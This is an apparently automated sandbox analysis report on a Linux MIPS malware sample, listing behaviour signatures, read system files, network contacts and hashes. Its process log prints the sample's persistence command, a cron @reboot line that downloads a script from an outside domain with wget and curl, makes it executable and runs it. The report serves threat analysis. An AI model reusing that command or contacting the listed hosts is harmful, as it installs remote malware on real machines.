Malware Analysis Report

2024-11-15 08:23

Sample ID 241028-bgxvlatrcv
Target 2bc1855eb4297c28116e412b6705e14a.bin
SHA256 9cb34a4c41186002a0d523d847cf95c4e099ac6c61a03888ad9e58e303be1d8f
Tags
defense_evasion discovery execution persistence privilege_escalatio
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

9cb34a4c41186002a0d523d847cf95c4e099ac6c61a03888ad9e58e303be1d8f

Threat Level: Shows suspicious behavior

The file 2bc1855eb4297c28116e412b6705e14a.bin was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery execution persistence privilege_escalatio

Renames itself

Unexpected DNS network traffic destination

File and Directory Permissions Modification

Creates/modifies Cron job

Changes its process name

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-28 01:07

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-28 01:07

Reported

2024-10-28 01:10

Platform

debian9-mipsbe-20240611-en

Max time kernel

150s

Max time network

149s

Command Line

[/tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/sh N/A

Renames itself

Description Indicator Process Target
N/A N/A /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf N/A

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 139.84.165.176 N/A N/A
Destination IP 185.181.61.24 N/A N/A

Creates/modifies Cron job

execution persistence privilege_escalatio
Description Indicator Process Target
File opened for modification /var/spool/cron/crontabs/tmp.22OlBk /usr/bin/crontab N/A

Changes its process name

Description Indicator Process Target
Changes the process name, possibly in an attempt to hide itself mini_httpd /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/filesystems /usr/bin/crontab N/A
File opened for reading /proc/mounts /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf N/A
File opened for reading /proc/724/status /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf N/A
File opened for reading /proc/730/status /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf N/A
File opened for reading /proc/718/cmdline /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf N/A
File opened for reading /proc/725/status /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf N/A
File opened for reading /proc/708/cmdline /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf N/A
File opened for reading /proc/727/cmdline /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf N/A
File opened for reading /proc/filesystems /usr/bin/crontab N/A
File opened for reading /proc/727/status /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf N/A
File opened for reading /proc/1/cmdline /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf N/A
File opened for reading /proc/728/status /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf N/A
File opened for reading /proc/729/status /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf N/A
File opened for reading /proc/731/status /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf N/A
File opened for reading /proc/726/status /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf N/A
File opened for reading /proc/2/cmdline /tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf N/A

Processes

/tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf

[/tmp/0d8c3289a2b21abb0d414e2c730d46081e9334a97b5e0b52b9a2f248c59a59ad.elf]

/bin/sh

[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]

/usr/bin/crontab

[crontab -]

/usr/bin/crontab

[crontab -l]

Network

Country Destination Domain Proto
IN 139.84.165.176:53 kingstonwikkerink.dyn udp
NO 185.181.61.24:53 kingstonwikkerink.dyn udp
GB 91.149.238.18:15088 kingstonwikkerink.dyn tcp

Files

/var/spool/cron/crontabs/tmp.22OlBk

MD5 7f870874f6e2e8a519bfb12fd9595bae
SHA1 a06aa499becd5f448356d6dcd76441142f5f4142
SHA256 09cfd32d5d70dceebe59d6eecc03de39f65428f59b214c62dea20d331085c51d
SHA512 f05c5887976e1e645d3b82d48f1492b24ef680e54483625d8eecc912ea4d38c36db62d9296bff4e3b1f418e7e50cde9c5083d685e77860c61372b19a6c06d620